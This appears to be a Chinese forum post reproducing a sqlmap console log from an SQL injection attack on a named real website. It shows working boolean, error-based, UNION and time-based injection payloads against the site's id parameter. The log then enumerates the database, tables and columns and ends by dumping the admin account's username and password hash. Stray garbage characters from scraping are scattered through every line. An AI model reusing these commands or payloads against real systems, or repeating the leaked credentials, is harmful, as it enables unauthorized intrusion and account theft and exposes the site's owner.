D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# Z( A( j: W2 \; m
ms "Mysql" --current-user /* 注解:获取当前用户名称
# |& s, \) A; D1 g8 J sqlmap/0.9 - automatic SQL injection and database takeover tool
. l$ [1 j) t X V K http://sqlmap.sourceforge.net starting at: 16:53:54( F/ F4 G' z* K, O9 u: L( i& _
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% Y* c$ W) a; P3 k0 L session file; h) F5 e) ^' l
[16:53:54] [INFO] resuming injection data from session file' {* l, ?% Z" F& t& W# [, X
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 C/ S- V! h6 ` V* a1 C
[16:53:54] [INFO] testing connection to the target url' p7 Y9 ^0 \& o6 k: w- r; h ]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: j% p. B0 N& P" Y3 a
sts:
/ F' c; j1 J! q; u- S---
4 F# f: f3 B. I1 m2 q8 N! w5 e: FPlace: GET8 d. w; Q0 v" U1 J- |
Parameter: id0 l3 p# A/ f' c
Type: boolean-based blind4 d' ]2 ], y3 H# K3 ^: Z: k
Title: AND boolean-based blind - WHERE or HAVING clause
# p5 d8 e; Z2 i5 G* R" \0 p Payload: id=276 AND 799=799. U& T# A6 u7 a0 S% P( q
Type: error-based
% k$ o8 U. D" B) }! I Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" z1 R& g. c$ L$ _4 w3 x1 s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- U3 H" }. z' H! ~- h8 r0 `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ x, Z1 A( U! S9 O Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
o# F5 G- t: I L. w Type: UNION query+ I$ i) Q7 x+ D+ `- r# m k% z- ?
Title: MySQL UNION query (NULL) - 1 to 10 columns$ C" g! Z& ^2 n4 U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, ?3 ?5 W$ I+ `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 z' P7 d5 W( E/ o2 x
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" S3 v, Q1 ^/ E% w; ]0 [
Type: AND/OR time-based blind; K5 _, l5 H# o) t5 S- @, m
Title: MySQL > 5.0.11 AND time-based blind4 a. e4 I3 U( f6 O
Payload: id=276 AND SLEEP(5)1 {8 @ |/ |, _* P( G$ L; A3 r
---; Y$ F) z- A" s( R+ M
[16:53:55] [INFO] the back-end DBMS is MySQL1 w. D n% \* n! G M
web server operating system: Windows% ^3 J. D. g c/ \8 x- J
web application technology: Apache 2.2.11, PHP 5.3.06 i( O3 S' {! j1 A& S" k( {. R6 x
back-end DBMS: MySQL 5.02 u) N O7 e) D
[16:53:55] [INFO] fetching current user
# Q9 E/ T3 x# r+ Icurrent user: 'root@localhost'
) H6 o. p, B0 O" k6 L: n% M[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% n' b9 X9 \. [. S6 V+ n8 o! utput\www.wepost.com.hk' shutting down at: 16:53:58
F+ B+ l; X% f8 d9 \5 j" Y* z/ F& F; `8 v7 X, W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 H& J( X$ K" v0 E8 p0 d4 ?
ms "Mysql" --current-db /*当前数据库9 }7 R) m* s6 ~" F" z8 U/ A2 M
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 ]1 i! G% \0 T t( Z http://sqlmap.sourceforge.net starting at: 16:54:16
( Z+ Y. G+ Y ^# T5 A[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. m, m% s5 s0 Z m E1 z$ b7 [ session file5 K8 W0 B0 Y7 U% {
[16:54:16] [INFO] resuming injection data from session file$ z" x9 A# |8 o C7 [. y! G
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
, C% P1 e5 v8 J[16:54:16] [INFO] testing connection to the target url
1 x7 Z. S) L4 m5 g( N0 i* ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% q8 _: C1 m" [* u. Tsts:
' E/ Z4 Z9 x& z8 e. F6 |---8 \% v% @( t! Z) b
Place: GET
( ]0 E0 E# F" Z% h& ?Parameter: id
; o6 ^, Y2 _' T4 A4 b0 D& n Type: boolean-based blind
% X6 |. D6 I+ }6 R Title: AND boolean-based blind - WHERE or HAVING clause) W7 ]# ^( P i. |' G
Payload: id=276 AND 799=799
# c7 m4 G; @/ p Type: error-based. ~1 ?, ` }1 u; W8 `
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 }- F9 T% X! F/ @: X0 b) t
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, } I* E# X# x/ L0 | ^120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- o, m W" d2 Z; ]8 Y6 ^7 W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# o; N1 F, A7 _/ D( n
Type: UNION query' Q5 H% I* y( S9 |- M; L
Title: MySQL UNION query (NULL) - 1 to 10 columns
% y% m0 a5 B* f7 F Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" P6 ]8 \. ^. h% j! Z4 c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 T5 S- j L$ u2 N5 |- g5 `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 N" Z& X% m% T6 E Type: AND/OR time-based blind
; p, D2 l# O" L* L5 {/ j l0 G Title: MySQL > 5.0.11 AND time-based blind
( T/ Q; _* W9 C3 r& _0 P# a Payload: id=276 AND SLEEP(5)8 j: `, j& p1 J; i( ^* I
---
) Q" k( G4 W U0 h) B/ [[16:54:17] [INFO] the back-end DBMS is MySQL: W; a) u, ?2 X; U$ [: h' Q
web server operating system: Windows
. }! O; }5 r! J9 r* \9 m- _6 zweb application technology: Apache 2.2.11, PHP 5.3.0) ~3 S3 j* @0 l
back-end DBMS: MySQL 5.03 g# f$ b) n' e
[16:54:17] [INFO] fetching current database
9 D9 u7 a/ g9 j: P( Xcurrent database: 'wepost'
# ?) ^1 R1 Y8 ?# l: B. B6 u) C[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 U y# x$ K' b( S- l" S Ytput\www.wepost.com.hk' shutting down at: 16:54:18. v. X% @ H1 ]) @, ]9 w# W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: `4 C* c4 o3 J7 L0 n) {" O
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名" I6 a" R+ B& t) u" h
sqlmap/0.9 - automatic SQL injection and database takeover tool' J1 M" n) l( ?# v) y
http://sqlmap.sourceforge.net starting at: 16:55:257 _, P7 r: h8 |! C* R( a# B6 A
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 {) @' G( u) Y" B" l
session file4 j; A1 L0 G2 t+ J4 ?7 s M
[16:55:25] [INFO] resuming injection data from session file) c3 N3 I+ Y ^" P4 w% N
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( g; M( H: D/ b. @* {6 C! y/ P; g5 z
[16:55:25] [INFO] testing connection to the target url
( T% s$ ^! t( @. o4 Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
# N- u, E2 N1 ksts:
7 E; [+ [; x: V# O9 w; R/ `---8 h0 D; {! ~4 q4 N5 K
Place: GET8 C6 B: j) D U6 }! L& I8 J
Parameter: id7 m/ ?" C) ^, I$ N0 T: ~( i$ a
Type: boolean-based blind4 h8 L) `8 Y& P- k" H `" X
Title: AND boolean-based blind - WHERE or HAVING clause5 o) Q* A& I+ s5 k0 D7 l' ]5 E
Payload: id=276 AND 799=799
; y+ u. V2 i4 _) }) O: l Type: error-based) z2 P7 B" A, U q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) E* `8 ~0 ^, }0 l; P. p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: V" I: X/ k" U( c. @* a0 u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 h+ {# J5 m4 W- s- ~
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 u7 j9 O) i# J# G9 P1 m( t7 ^ Type: UNION query9 f( T m% q/ t; @6 G1 q0 T7 L% U5 A
Title: MySQL UNION query (NULL) - 1 to 10 columns' J. m* o5 T% V) M
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ N# p6 L# K! F) e+ Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" \3 n% O5 u7 m% nCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! R4 c8 l, u, {* j0 K4 E Type: AND/OR time-based blind' w1 U8 k# ]+ f$ g5 p
Title: MySQL > 5.0.11 AND time-based blind
& C6 b! I8 q) P5 B' t4 l Payload: id=276 AND SLEEP(5)5 F0 `" g0 h* n
---
" ~4 o: T s0 s' ^# l[16:55:26] [INFO] the back-end DBMS is MySQL/ Y0 g& H$ N+ \! h V3 q. e9 ^
web server operating system: Windows1 P% @- _$ a# J& a: @8 x
web application technology: Apache 2.2.11, PHP 5.3.04 e6 H( c' C, p, u6 T5 F
back-end DBMS: MySQL 5.0: p/ g" P* @+ i, A& D
[16:55:26] [INFO] fetching tables for database 'wepost'
3 J' [9 q, m0 `& G[16:55:27] [INFO] the SQL query used returns 6 entries3 W9 o7 B) ]* A- I; o
Database: wepost6 A3 S+ x7 r4 \- |. B8 j0 d
[6 tables]
6 E7 h: L, q# C# p' {; r0 F! E+-------------+9 v4 L/ ^( E$ Q1 L6 I* Y+ p
| admin |
6 C" I0 |2 [, W4 N0 c5 D| article |
5 Z7 X# t4 k# W, Z2 x* v| contributor |4 Y- J+ b! X% a1 }5 e
| idea |' U5 y; |. u$ C) j% a! Q6 n( Q
| image |& n& [4 V2 m& h- Z5 A' b# A) T
| issue |
O; r. y: y6 |8 S8 l. j6 _( e6 r5 T6 Z+-------------+
$ Y0 M) `/ ]6 m( B+ A[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, y; R- A. u8 [1 S7 p" [4 ]
tput\www.wepost.com.hk' shutting down at: 16:55:33
+ ]( X( R$ a. e& ~5 @ a/ J4 V
2 G \( z$ f; ~0 \3 D; ~' VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 [8 @3 t9 f, O3 E1 Q! ?2 O% Kms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
7 i0 R3 n, {+ Y P6 b0 T8 v( z sqlmap/0.9 - automatic SQL injection and database takeover tool1 X. t% _- }& R
http://sqlmap.sourceforge.net starting at: 16:56:068 A7 p; |; b9 \+ J% T
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. Q) j* d$ \0 o u+ o. ?* d
sts:. Z2 S b$ P X' s$ E) Y
---/ L0 ?& X1 {" i7 ?
Place: GET8 X8 A; r1 T3 a1 a+ W
Parameter: id
! R& p3 ^2 D) G/ R Type: boolean-based blind, l9 o2 m$ k6 E; p8 x
Title: AND boolean-based blind - WHERE or HAVING clause k, Y) v! y- U3 v2 n& _
Payload: id=276 AND 799=799
7 ?4 d+ ]6 K: W J# a+ F+ v' o Type: error-based
/ }/ I% N# S4 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# {, S0 V& f" u3 t( Z: E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ V6 L% c% c/ w+ P6 s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, }$ X5 y8 V$ P4 h
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 i0 h4 t! b/ A
Type: UNION query# J) X% {) _) S' Q5 u
Title: MySQL UNION query (NULL) - 1 to 10 columns, F, [$ b7 ^) M4 u" @1 H S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# D7 I. n. X5 w$ I7 z2 @& x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 l; |' K; y# k# D3 {, ]
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 X n, e$ f. D( a Type: AND/OR time-based blind
: b7 D0 Q2 p! W/ @! s Title: MySQL > 5.0.11 AND time-based blind
( y9 `8 h# p( E9 C7 K" h Payload: id=276 AND SLEEP(5)
2 t6 U4 d0 @. O! E' H# w7 V---
$ E& q: ^- }$ Tweb server operating system: Windows
/ M% x/ S7 Y: l6 X, ?4 V6 wweb application technology: Apache 2.2.11, PHP 5.3.0
5 K0 W6 R) {2 K' c' Pback-end DBMS: MySQL 5.0: ^- u8 U: j' t
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
* F0 Y( T- H( v; T# c, ossion': wepost, wepost: o" S, f( p+ U8 f/ Y
Database: wepost1 l1 v+ I9 I, H* }, W4 L
Table: admin
( l# W, w4 f- J" I6 E[4 columns]
3 M! q" g9 u4 Q& M4 f! v+----------+-------------+ c6 S g+ i, z: m
| Column | Type |
0 ?7 B% g# d) g/ I1 w: P5 j+----------+-------------+2 H% @% E) {. j1 _4 T' e3 W, I/ ^
| id | int(11) |
" d5 U+ T- ?& _5 h( V| password | varchar(32) |9 ]' U. }# E% K1 W5 y+ m
| type | varchar(10) |5 ? } |9 ^. I- w
| userid | varchar(20) |1 i8 e% H3 D/ \0 t0 c" T
+----------+-------------+
0 N" g7 a0 Q) i" Z: { shutting down at: 16:56:19
. V$ ]4 S5 z' X$ i3 ]
! I! i- o. P0 B0 DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) T+ q; M0 q$ cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
8 E5 {+ a+ w: W) A$ ]! A$ \ sqlmap/0.9 - automatic SQL injection and database takeover tool7 i# q" M1 U4 ^$ q, z! a
http://sqlmap.sourceforge.net starting at: 16:57:14- I* t) S4 Q9 Y5 s/ c3 J
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ ?3 R0 m' ~1 U* V+ i. Gsts:
7 j: R. a0 P: \( m1 E+ w- ~ L$ p---
* o) Q L+ }) W2 y/ {: BPlace: GET# x- w2 N8 B5 I! Z6 l
Parameter: id# t. \8 F0 V1 A
Type: boolean-based blind
' U/ }! I9 Z& }; I& ` Title: AND boolean-based blind - WHERE or HAVING clause7 v/ y1 Z9 D( [. e: D
Payload: id=276 AND 799=799
+ \- E% |8 y% F) S Type: error-based
# p- C7 P2 j% ?- ]" I5 J Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! N* I" }9 @4 K. m: T
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% ~2 H2 C, ]* z6 D5 j
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 P- t# T7 u# ~& h4 b* o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: _# B2 Q) E! T: X$ Q, B G# s* \ Type: UNION query
# g- n: {3 ?% m) x1 y Title: MySQL UNION query (NULL) - 1 to 10 columns
* w- ]; q, g0 N" E" N! t- C3 ` Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 x9 e+ X4 O2 u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# }! B% c# h* u, zCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 g+ x8 f) b0 \- y: i9 y7 k Type: AND/OR time-based blind, I9 f; @, a5 C& t" y
Title: MySQL > 5.0.11 AND time-based blind
8 v+ ]" z e# n% g& z- F Payload: id=276 AND SLEEP(5)
2 p( {4 B5 W9 A4 G0 e+ i! r---
% L3 C1 d' }! i( h* i Pweb server operating system: Windows
G, N( {: s1 K/ v! G' Kweb application technology: Apache 2.2.11, PHP 5.3.05 u6 x6 h3 r N' J& z
back-end DBMS: MySQL 5.0, H/ l- ]/ H! N. b1 P/ Y2 `
recognized possible password hash values. do you want to use dictionary attack o' _ {* V- F3 I' {
n retrieved table items? [Y/n/q] y
( Q% @$ @+ ^8 }% @8 j: Fwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
- ~0 K! |. u+ d; E+ ]7 _8 zdo you want to use common password suffixes? (slow!) [y/N] y9 C# {) x$ \# Z: w9 U5 D
Database: wepost" M- N3 C d' j! H: u
Table: admin+ e# U, M4 g6 |5 J& r5 |* z
[1 entry]6 L1 l7 O, n0 H) n- e' A: F
+----------------------------------+------------+
% D' K# d+ d O) G$ B' M| password | userid |
' X N- @/ K" E+----------------------------------+------------+
" F0 K1 G7 X0 A2 r2 v7 v" k. D) d| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
. ^3 v- ]4 F. X$ |$ X) N. }+----------------------------------+------------+
: z. v+ [9 v' ]2 l shutting down at: 16:58:14% s) L4 l( L$ J/ `
8 U8 V+ v% ~+ k$ ~& fD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对